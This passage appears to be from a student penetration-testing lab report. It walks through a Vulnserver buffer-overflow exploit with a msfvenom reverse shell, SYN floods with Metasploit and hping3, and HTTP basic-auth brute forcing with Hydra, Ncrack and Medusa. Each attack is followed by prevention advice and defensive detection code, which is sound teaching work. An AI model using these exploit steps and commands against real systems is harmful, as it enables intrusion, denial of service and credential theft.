Next, the opcode equivalent of a jump is needed. In Kali, from the terminal, locate nasm_shell.rb and run it to convert the assembly instruction JMP ESP into its hex opcode, as shown in figure 21.
This is going to be used as the pointer: the pointer jumps to the malicious shellcode. The hex opcode of JMP ESP is FFE4.
Then go back to Immunity Debugger and type this in the bottom bar: !mona find -s "\xff\xe4" -m essfunc.dll. The result is shown in figure 22.
The first line is the address we are looking for; so, going back to Kali, the Python code is modified as shown in figure 23.
In this code, the return address found with mona replaces the B's as the pointer, so EIP holds the address of the jump instruction, and that jump leads to the malicious code. The pointer is written in reverse byte order for a specific reason: the x86 architecture is little-endian, meaning it stores the low-order byte at the lowest address and the high-order byte at the highest address. This code sends the same input as before, but this time EIP lands on the jump instruction.
Some settings need to be changed in Immunity Debugger before running the code, so that the jump can be caught. Use the expression box to go to the pointer address, then set a breakpoint there; when the overflow reaches this point the program will not go on to the next instruction but will pause at the breakpoint, which confirms that the address was hit.
Now back to Kali to execute the script. After executing it, the result is shown in figure 25: the breakpoint at essfunc.625011AF is hit and the program pauses, which means EIP is controlled and points exactly where intended.
So, generate shellcode, point directly to that shellcode, and it can be used to get root.
To gain a shell, use a tool called msfvenom, which helps to generate shellcode; the command is shown in figure 26. msfvenom is part of Metasploit. The -p switch sets the payload: the payload is for Windows, because the target is a Windows machine, and it is a reverse TCP shell (x86 is assumed, and is declared later). A reverse shell makes the victim connect back, so the connect-back information has to be provided: the Kali machine's IP address as LHOST and the port it listens on as LPORT. Setting EXITFUNC to thread makes the exploit more stable. Then -f sets the file type, which is exported as C; -a sets the architecture, x86; and -b gives the bad characters that were found.
Then hit enter and the code will be generated. Copy the code highlighted in figure 27 and add it to the Python code. Figure 27 also shows that the payload size is 351 bytes.
Modify the Python code by adding a new variable called overflow and pasting the generated shellcode into it, and also edit the shellcode variable by adding the new variable and
This code works by sending the shellcode variable: 2003 bytes reach EIP, which then holds the pointer address. As the pointer address is the jump address, execution jumps to the supplied set of instructions, which is the overflow variable. Before submitting that, NOPs need to be added. NOP means no operation; the NOPs are padding, a little pad space between the jump command and the overflow shellcode. 32 bytes is the best-fitting amount of padding.
Open a new terminal window in Kali and set netcat to listen, as shown in figure 29.
Before launching the attack, make sure Vulnserver is running, then execute the Python code.
As shown in figure 30, Vulnserver can now be controlled from Kali, which means having root on it.
Prevent Buffer Overflow Attacks
The easiest way to prevent buffer overflows is to use a language that does not allow them to happen. However, changing the development language is not always possible; in that case, write secure code for handling buffers and avoid the unsafe functions. The strcpy and strcat functions copy a string into a buffer and append the contents of one buffer onto another without checking the size of the destination.
Also, by using safe buffer-handling functions together with suitable security features of the compiler and operating system, a good defence against buffer overflows can be built.
Searching the lines of program code for potential buffer overflows by hand can be tedious, but static analysis tools, which are used to enforce code quality, were developed for this reason: detecting security weaknesses during development. For example, Coverity Code Advisor highlights potential buffer overflows with red flags. The code can then be changed to make it more secure, instead of finding the buffer overflows by searching manually.
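As an added illustration of what such a static check does (this is example code written for this discussion, not the logic of Coverity or any other product): a small Python scanner that reads C source text, flags calls to strcpy, strcat, gets and sprintf, and names the bounded replacement a reviewer would ask for. The C fragment it scans is constructed here so that it contains the two functions the text names; the buffer size and function names in it are assumptions.

```python
import re

# Unsafe C string/buffer functions and the bounded replacement normally
# requested in review. A real static analyser does far more than this
# constructed illustration (data-flow, interprocedural size tracking).
UNSAFE_CALLS = {
    "strcpy": "strncpy/strlcpy with the destination size, or snprintf",
    "strcat": "strncat/strlcat with the remaining space",
    "gets": "fgets(buf, sizeof buf, stdin)",
    "sprintf": "snprintf(buf, sizeof buf, ...)",
}

# \b keeps strncpy/strncat/fgets from matching strcpy/strcat/gets.
CALL_PATTERN = re.compile(r"\b(" + "|".join(UNSAFE_CALLS) + r")\s*\(")


def find_unsafe_calls(source):
    """Return (line_number, function_name, suggestion) for every unsafe call.

    Lines that are only comments are skipped, so a comment that mentions
    strcpy does not produce a finding.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("//") or stripped.startswith("/*"):
            continue
        for match in CALL_PATTERN.finditer(line):
            name = match.group(1)
            findings.append((lineno, name, UNSAFE_CALLS[name]))
    return findings


def report(source):
    """Human-readable report, one line per finding."""
    return "\n".join(
        f"line {lineno}: {name}() -> use {fix}"
        for lineno, name, fix in find_unsafe_calls(source)
    )


# Constructed C fragment (an assumption for this example) in the style of a
# naive network service: a fixed stack buffer filled from untrusted input.
SAMPLE_C_SOURCE = """\
#include <string.h>
#include <stdio.h>

void handle(const char *input) {
    char buf[64];
    strcpy(buf, input);   /* finding: no bound on the input length */
    strcat(buf, "\\n");   /* finding: buf may already be full */
    /* strncpy(buf, input, sizeof buf - 1) is the bounded form */
    puts(buf);
}
"""

if __name__ == "__main__":
    print(report(SAMPLE_C_SOURCE))
```

The comment on the strncpy line is deliberately skipped, which is why only the two real calls are reported; a practitioner would run the same scan over a whole tree and treat each hit as a place to check the destination size.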
DDoS Attack
There are two types of this attack, and there are many ways to carry it out using different tools. There is DDoS and DoS; both perform the same attack.
DDoS stands for Distributed Denial of Service. It is a cyber attack on a specific server or network with the intended purpose of disrupting that network or server's normal operation, and a DDoS attack does this by flooding the targeted network or server with a constant flood of traffic, which causes a disruption or denial of service. In figure 31 there is a web server and a couple of customers browsing the website, and there is someone who wants to attack this web server by sending a flood of data traffic to try to disrupt its service. This is a DoS attack: the attack comes from one source. Normally a network or server is able to handle an attack from a single source, because it is easy to pinpoint and the server can close the connection the attack comes from. The real problem is when the attack comes from multiple sources at the same time, which is what a DDoS is: an attack from multiple sources all at once.
There are different ways to do this attack; the most popular is the SYN flood (Metasploit, hping3).
The SYN flood: when two PCs try to communicate, they use the three-way handshake to set up a TCP session. The attacker sends a SYN packet and the server replies with a SYN/ACK packet; after replying, the server waits to get the last packet from the attacker. In a SYN flood the attacker never replies, it just keeps sending SYN packets. This is how the SYN flood works: the server is overloaded by waiting, and in this way the denial of service is achieved.
Tools for doing the SYN flood:
1. Victim machine: Windows 10 (Wireshark).
2. Attacker machine: Kali Linux (Metasploit).
SYN Flood Metasploit walkthrough:
Starting with Windows 10, open Wireshark to see the attack; Wireshark is used for network troubleshooting, analysis, and monitoring. Also open Task Manager to see the CPU usage. Figure 33 shows the Windows 10 CPU usage with only Wireshark running: 3%, which is the maximum value before the attack.
From Kali, check whether the attack machine can ping the target machine, and run Nmap to see the open ports, as shown in figure 34. The attack has to be sent to an open port; Nmap shows that port 135 is open, so this port will be targeted. All of them could be targeted, but in this task 135 is the target port.
After checking, run Metasploit, because it has the SYN flood tool. To run Metasploit, type msfconsole in the terminal. Once it is running, search for synflood and Metasploit will show where the auxiliary is located. Then use it by typing use followed by the path given by Metasploit, as shown in figure 35, and then view the options of this auxiliary.
The options are INTERFACE, for naming the interface; NUM, for the number of SYN packets to send; RHOST, for the victim machine's IP address; RPORT, the port to send the SYN packets to (by default it is set to 80, but it needs to be changed to 135, the chosen port); and SHOST, for spoofing who is sending this attack.
So, set the host IP address, the port number, and the number of SYN packets to be sent, as shown in figure 36. After setting these, type exploit to start the SYN flood attack, as shown in figure 37.
After running the attack, the CPU percentage rises above normal: it was 3%, but after the SYN flood it is 43%, as shown in figure 38.
On the other side, the Wireshark capture clearly shows the thousands of SYN packets being sent to the Windows machine. Wireshark with this large amount of traffic is shown in figure 38. In figure 39, the grey colour in Wireshark means the attacker sent a SYN packet to target port 135, and the black ones are the replies from Windows.
SYN Flood with Hping3 walkthrough:
Starting with Windows 10, open Wireshark to see the attack, and then open Task Manager to see the CPU usage. Figure 40 shows the Windows 10 CPU usage with only Wireshark running: 3%, which is the maximum value before the attack.
Now, from Kali, open a terminal window and type hping3 --help to see all the options and learn how to use hping3 in detail, then choose the best ones for the attack. For this attack, -a is used to spoof the IP address, -s for the SYN flood attack, and -p for the port number. The command used for this attack is shown in figure 41.
Figure 41 shows the attack command after it is run, with a message saying that no replies will be shown. Moving to Windows 10 shows what this attack is doing to it, in figure 42: the CPU usage clearly reaches 100% and the machine freezes, while Wireshark shows the red traffic of the attack on the chosen port. Also, the longer the attack is left running, the more RAM it consumes.
Prevent DDoS attacks
Increase bandwidth
The basic step that can be taken to make the infrastructure "DDoS resistant" is to make sure there is enough bandwidth to handle the traffic that comes from malicious activity. This worked in the past, but nowadays attackers make use of amplification attacks, so this step only makes it harder for an attacker to carry out the DoS attack.
Use redundancy in the infrastructure and DNS
This approach is about spreading the website across different data centres with a load-balancing system that distributes the traffic. If possible, use data centres in different locations. This makes it hard for the attacker to deny the service: if one of them is successfully taken down, the others will do the job.
Configure network hardware to avoid DDoS attacks
Some configuration changes can be made on network devices; for example, configure the firewall or router to drop incoming ICMP packets, and block UDP DNS responses coming from outside the network. This can help to stop some types of DDoS attack.
Use anti-DDoS software and hardware modules
Set up web application firewalls on the servers and use load balancers. There is software that protects against DDoS protocol attacks, for example SYN flood attacks, by monitoring how many incomplete connections exist and dropping them when the number rises above normal. There is more similar software for the other types of DDoS attack.
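The SYN flood description above and the "incomplete connections" monitor mentioned in this paragraph can be shown together in code. The following Python is an added example, not from the report or from any product: it replays constructed packet summaries like those in the Wireshark capture, treats a handshake as complete only when the client's final ACK arrives, and raises an alert when one source holds too many half-open connections. Because the hping3 walkthrough spoofs the source address with -a (and the Metasploit auxiliary has SHOST for the same purpose), a per-source count alone can be evaded, so the total number of half-open connections is checked as well. The IP addresses, limits and record layout are assumptions made for the example.

```python
from collections import defaultdict

# Constructed packet summaries, modelled on the Wireshark capture the report
# describes: (src_ip, src_port, dst_ip, dst_port, flags). The addresses are
# assumptions. 10.0.0.5 completes a normal three-way handshake on port 135;
# 10.0.0.99 sends 200 SYNs and never answers the server's SYN/ACKs.
SERVER_IP = "10.0.0.10"
SAMPLE_PACKETS = (
    [("10.0.0.5", 50000, SERVER_IP, 135, "SYN"),
     (SERVER_IP, 135, "10.0.0.5", 50000, "SYN/ACK"),
     ("10.0.0.5", 50000, SERVER_IP, 135, "ACK")]
    + [("10.0.0.99", 40000 + i, SERVER_IP, 135, "SYN") for i in range(200)]
    + [(SERVER_IP, 135, "10.0.0.99", 40000 + i, "SYN/ACK") for i in range(200)]
)


def half_open_connections(packets, server_ip):
    """Return {client_ip: count} of handshakes a client started but never finished."""
    pending = set()
    for src, sport, dst, dport, flags in packets:
        if dst != server_ip:
            continue  # the server's own SYN/ACKs do not change handshake state
        key = (src, sport, dport)
        if flags == "SYN":
            pending.add(key)          # second step of the handshake still owed
        elif flags == "ACK":
            pending.discard(key)      # the client's final ACK completes it
    counts = defaultdict(int)
    for src, _sport, _dport in pending:
        counts[src] += 1
    return dict(counts)


def syn_flood_alerts(packets, server_ip, per_source_limit=50, total_limit=500):
    """Alert on any source above per_source_limit and on the total above total_limit.

    The total check matters because a flood with spoofed source addresses
    spreads the half-open connections over many apparent sources that never
    individually exceed the per-source limit.
    """
    half_open = half_open_connections(packets, server_ip)
    alerts = [
        f"{ip}: {n} half-open connections"
        for ip, n in sorted(half_open.items())
        if n > per_source_limit
    ]
    total = sum(half_open.values())
    if total > total_limit:
        alerts.append(f"total half-open connections {total} exceeds {total_limit}")
    return alerts


if __name__ == "__main__":
    for alert in syn_flood_alerts(SAMPLE_PACKETS, SERVER_IP):
        print(alert)
```

In a real deployment the same state table would be expired on a timer, since a legitimate client on a slow link also leaves a connection half-open for a moment; the limits here are thresholds to tune against the server's normal backlog, not fixed values.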
Web Authentication Hacking
This method is about securing a web page against users who are not authorised by using HTTP authentication, a mechanism that allows only authorised users in. In this task, attempts will be made to break it using Metasploit. HTTP authentication works as figure 43 shows: the user asks the web server for access, and the server checks whether this user is authorised. If yes, it grants access; if not, it shows the unauthorised page with error number 401. This is basic authentication.
Steps to conduct a web authentication hack:
1. Install and set up apache2.
2. Configure basic authentication in apache2.
3. Create a test web page.
4. Set up Metasploit with the http_login auxiliary and run the attack.
5. Set up the Hydra tool and run the attack.
6. Set up the Ncrack tool and run the attack.
7. Set up the Medusa tool and run the attack.
Machines for doing the web authentication hack:
1. Victim machine: Ubuntu (apache2 web server).
2. Attacker machine: Kali Linux.
Web authentication walkthrough:
Start with installing and setting up apache2. Installing apache2 on Ubuntu does not take much time: type (sudo apt-get install apache2) in the terminal and the system will ask "Do you want to continue [Y/n]". Type Y to continue and it will go through the installation. When it finishes, open the web browser and type either localhost or the IP address of the Ubuntu machine in the URL bar, as shown in figure 44. This is the default page of apache2.
Then configure basic authentication in apache. This is done by installing the apache utilities: open a terminal and type (sudo apt-get -y install apache2-utils) to start the installation. When it finishes, create a new file named auth-basic.conf in the path /etc/apache2/sites-available, which can be done with the command (sudo nano /etc/apache2/sites-available/auth-basic.conf). Inside that file, type the configuration shown in figure 45.
Next, create a user with the command (htpasswd -c /etc/apache2/.htpasswd talal). This command creates a user named talal; after pressing enter it asks for a new password. The password chosen is 111, and then it asks to re-type the new password, which should be the same as the first. It then shows the message shown in figure 46.
After that, make a new directory named auth-basic with the command (mkdir /var/www/html/auth-basic). This is where the HTML page is stored; mkdir is the Linux command for creating a new directory.
The new configuration needs to be activated with the command (a2ensite auth-basic). It then shows a message saying to reload apache2 to activate the new configuration; to reload the web server, type (systemctl reload apache2).
Moving on, create the test web page. This page should be inside the new directory, at the path /var/www/html/auth-basic, and be named index.html so that it is the default page of the web server. The basic page is shown in figure 47.
Then try to access the web page through the web browser: open the browser and type either localhost or the IP address in the URL bar. Here the IP address and the directory name are used, as shown in figure 48.
If Cancel is clicked, the unauthorised page shown in figure 49 opens.
Thus, the basic authentication is working; the next step is to break it from Kali.
Metasploit with auxiliary http_login
From Kali, open a terminal and type msfconsole to run Metasploit. Metasploit has many auxiliaries that are used to hack or to test security; in this case the basic authentication needs to be broken, and the best auxiliary for that is http_login. This auxiliary is simple to use. First find the path of the auxiliary in Metasploit by running search http_login, which gives its location. When the location is found, type (use auxiliary/scanner/http/http_login) and then show options; the options explain how to use the auxiliary correctly, and they are shown in figure 50.
To do the attack, two files need to be created: one for usernames and one for passwords, containing some guesses that might be correct. Set the username file in the USER_FILE option and the password file in PASS_FILE; also set AUTH_URI to /auth-basic, STOP_ON_SUCCESS to true, and RHOST to the IP address of the web server, as shown in figure 51.
Finally, type run to start the attack. The auxiliary starts matching usernames with passwords and tries to unlock the HTTP authentication with the guesses it has been given. If nothing matches and the true username and password are not found, it gives an error message; on the other hand, if it finds a match, it gives the correct username and password to log in as a normal user. Figure 52 shows the non-matching results with a - sign and the match with a + sign.
Hydra Software
Hydra is one of the best tools on this attacking platform. Besides being fast at this type of attack, Hydra can also work with different protocols such as telnet, HTTP, HTTPS, FTP, several databases, SMB, and more, up to 50 protocols.
To do this attack, type hydra on the command line and it will show the options and how Hydra can be used to start attacking the HTTP authentication. From the list, -L is needed for the username list, -P for the password list, and -m for the URL of the website, followed by the name of the protocol. Type the command (hydra -L username.txt -P password.txt 209.165.201.18 -m http://209.165.201.18/auth-basic http-get).
As shown in figure 53, the Hydra tool finds the username talal and the password 111, highlighted in green.
Ncrack network authentication
Ncrack is a network authentication cracking tool. It does the same job of finding the username and password from a supplied list; the tool was developed to help network administrators find weak passwords, by testing all the hosts in the network, so that the network can be secured.
To do this attack, type ncrack on the command line and it will show the options and how Ncrack can be used to start attacking the HTTP authentication. From the list, -U is needed for the username list, -P for the password list, and then the URL of the website. So the command is (ncrack -U username.txt -P password.txt http://209.165.201.18).
As shown in figure 54, the Ncrack tool finds the username talal and the password 111, highlighted in yellow.
Medusa
Medusa is a login brute-force tool. It supports many different protocols such as HTTP, AFP, FTP, IMAP, rlogin, CVS, SSH, Subversion, VNC, and more.
To do this attack, type medusa on the command line and it will show the options and how Medusa can be used to start attacking the HTTP authentication. From the list, -U is needed for the username list, -P for the password list, -h for the URL of the website, -M for the protocol name, and -f to stop scanning after the first valid pair is found. So the command is (medusa -h 209.165.201.18/auth-basic -U username.txt -P password.txt -M http -f).
As shown in figure 55, the Medusa tool finds the username talal and the password 111, highlighted in yellow.
Prevent HTTP authentication hacking
The tools that perform rapid dictionary attacks work on the error messages: if the response is one of the 400-type errors, they keep trying until they get an HTTP 200 OK response. So the web server can be protected by always giving the HTTP 200 OK response, which makes it difficult for an attacker to distinguish a valid login from an invalid one.
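The same 401-versus-200 signal that the brute-force tools rely on is visible to the defender in the Apache access log, and counting it is the basis of every login rate limiter. The following Python is an added example, not part of the report: it parses constructed common-log-format lines for the /auth-basic page set up above, counts 401 responses per client, flags a client that exceeds a threshold, and also flags a 200 that follows such a run, which suggests a guessed password. If failed attempts were answered with 200 OK as the text suggests, this status-code count would stop working and a monitor would have to key on the authenticated-user field instead. The client addresses, timestamps and threshold are assumptions made for the example.

```python
import re
from collections import defaultdict

# Apache "common" log format: host ident user [time] "request" status bytes
LOG_PATTERN = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Constructed access-log lines (assumptions for this example). 203.0.113.7
# is a real user who mistypes once; 198.51.100.9 hammers the protected page
# forty times and then gets a 200, i.e. a guess succeeded.
SAMPLE_LOG = (
    ['203.0.113.7 - - [01/May/2019:10:00:01 +0000] "GET /auth-basic/ HTTP/1.1" 401 381',
     '203.0.113.7 - talal [01/May/2019:10:00:09 +0000] "GET /auth-basic/ HTTP/1.1" 200 210']
    + [f'198.51.100.9 - - [01/May/2019:10:05:{i:02d} +0000] "GET /auth-basic/ HTTP/1.1" 401 381'
       for i in range(40)]
    + ['198.51.100.9 - talal [01/May/2019:10:05:40 +0000] "GET /auth-basic/ HTTP/1.1" 200 210']
)


def parse_access_log_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    match = LOG_PATTERN.match(line)
    return match.groupdict() if match else None


def brute_force_report(lines, protected_prefix="/auth-basic", threshold=10):
    """Count 401s per client under protected_prefix and flag suspicious clients.

    Returns {"suspects": {ip: failures}, "likely_compromised": {ip: failures}}.
    A client is a suspect at `threshold` or more failures; it is "likely
    compromised" if a 200 arrives after it has already reached that threshold.
    """
    failures = defaultdict(int)
    compromised = {}
    for line in lines:
        rec = parse_access_log_line(line)
        if rec is None or not rec["path"].startswith(protected_prefix):
            continue
        ip = rec["ip"]
        if rec["status"] == "401":
            failures[ip] += 1
        elif rec["status"] == "200" and failures.get(ip, 0) >= threshold:
            compromised[ip] = failures[ip]
    return {
        "suspects": {ip: n for ip, n in failures.items() if n >= threshold},
        "likely_compromised": compromised,
    }


if __name__ == "__main__":
    result = brute_force_report(SAMPLE_LOG)
    for ip, n in result["suspects"].items():
        print(f"{ip}: {n} failed logins on /auth-basic")
    for ip, n in result["likely_compromised"].items():
        print(f"{ip}: successful login after {n} failures, check this account")
```

The single failure from the real user stays below the threshold, so only the scripted client is reported; in practice the counts would be kept per time window and fed to a blocking rule rather than printed.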
To stop this kind of attack, random content is added to the page as a graphic that the login brute-force tools cannot read, in GIF, JPG or PNG format, so that a user has to be on the web page to attempt a login. Figure 56 shows an example of such a graphic.
On the other hand, web scanning tools can be used to discover weaknesses in the website and avoid different types of attack.
Furthermore, a strong username and password are needed. There are some common usernames and passwords that attackers use to guess the credentials, shown in the following table.
Appendix:
Appendix 1:
Install and set up VirtualBox:
Download the exe file from the official site https://www.virtualbox.org/wiki/Downloads. For this project version 6.0.6 was chosen. After downloading the exe file, double-click on it and then follow the setup wizard, as in figure 24.
After clicking on the Next button, a new window appears, as in figure 25.
In this step, select the features to install and the location where VirtualBox should be installed. Then click the Next button, and a new window appears, as in figure 26.
In this step there are options, shown in figure 26, for example a shortcut on the desktop; the user chooses one or all of them according to need. Then clicking the Next button starts the installation; when it finishes, VirtualBox starts with the welcome screen, as in figure 27.
Finally, VirtualBox is ready to run the new OS as a virtual machine.
Appendix 2:
Install and set up Ubuntu
Download the ISO file from the official Ubuntu site https://www.ubuntu.com/download. In this project all the operating systems run as virtual machines, so to install a new machine, open VirtualBox and add a new machine, as shown in figure 28.
To create a new virtual machine, first give it a name and the type of OS; in this case Linux, with the version Ubuntu 64-bit. Then click the Next button.
When the Next button is clicked, the new window in figure 29 appears.
In this window the memory size can be set; by default VirtualBox gives the recommended size, and the user can add more. Then click Next, as shown in figure 30.
In figure 30, for the hard disk or storage, VirtualBox gives the recommended size and the recommended hard disk option. There are three different options: the first is not to add a hard disk for this OS, the second is to create a virtual hard disk, which is the recommended option, and the third is to use an existing virtual hard disk. After choosing the recommended option, click the Create button, which shows the window in figure 31.
In creating the virtual hard disk there are three options: VDI (VirtualBox Disk Image), VHD (Virtual Hard Disk), and VMDK (Virtual Machine Disk). The recommended one is VDI. Moving on, click Next, as in the window in figure 32.
In this step of creating the hard disk there are two options. The first is dynamically allocated, which means the disk space is not taken from the host up front but only as it is needed; the second is fixed size. The recommended one is dynamically allocated. Then click Next, and the window is as in figure 33.
In this step, choose a name and location for the new virtual hard disk and then its size, and click Create. Clicking Create is the last step to do in VirtualBox; then move on to installing Ubuntu, which only needs a double-click on the new virtual machine. Figure 34 shows what appears after clicking on the new virtual machine.
In this step, only the Ubuntu ISO is required to start the installation; after locating the ISO, click Start, and the install window appears, as in figure 35.
The first window has two options: one is to try Ubuntu and the second is to install it. The option needed is to install Ubuntu; clicking on it shows the next window, as in figure 36.
This is for choosing the keyboard language or layout; after that, how the user wants to install the OS, custom or recommended; after that, formatting the disk. Then click Continue, as in figure 37.
Here, choose the region and click Continue, as shown in figure 38.
In this step, create a username and password and continue. This is the last step; the installation then starts, and Ubuntu is ready for use.
Appendix 3:
Install and set up Kali
This version of Kali is the Cisco version, so the copy will be imported into VirtualBox. To import a copy into VirtualBox, from the toolbar choose File and Import Appliance, and the new window opens as shown in figure 39.
In the first window, locate the copy on the host machine, in OVF format. Then clicking Next shows the new window in figure 40.
This is the last step of importing the copy of the virtual OS: just click on the Import button, as shown in figure 40, and Kali Linux will appear on the list.
Appendix 4:
Install and set up Windows 10
Download the ISO file from the official Windows site https://www.microsoft.com/en-gb/software-download/windows10
These are the same steps as for installing Ubuntu; the difference is that when choosing the ISO file, Windows 10 is chosen. The Windows 10 installer is shown in figure 41.
Figure 41 shows the first window for installing Windows 10. Choose the language, time and format, and keyboard or input method. Then clicking Next shows the next window, as in figure 42.
This window has the Install button; when it is clicked, it goes to the next window with the license terms. Accept them and click Next, which opens the new window shown in figure 43.
This window has two options: upgrade or custom install. In this case, install a new Windows 10. Clicking on it opens a new window, as shown in figure 44.
This window is for locating the installation; click Next, because a new hard disk was created for Windows 10. Clicking Next starts the installation, as shown in figure 45.
Then Windows 10 is ready for use.
Appendix 5:
The project plans
Action plan for work package
Plan attack
Appendix 6:
Install and set up WebGoat 8
WebGoat will be installed on Ubuntu. To install it, get the jar file from https://github.com/WebGoat/WebGoat; from the GitHub site go to releases https://github.com/WebGoat/WebGoat/releases. In this project v8.0.0.M21 was chosen, and its jar file was downloaded on Ubuntu. To be able to run WebGoat 8, Java 11 needs to be installed; there is no need to install Tomcat because v8 of WebGoat includes it. Then from the terminal run the command below:
java --add-modules java.xml.bind -jar webgoat-server-8.0.0.M21.jar
WebGoat will start. Open a browser and type (localhost:8080/WebGoat) in the URL bar; the WebGoat login page will then be shown.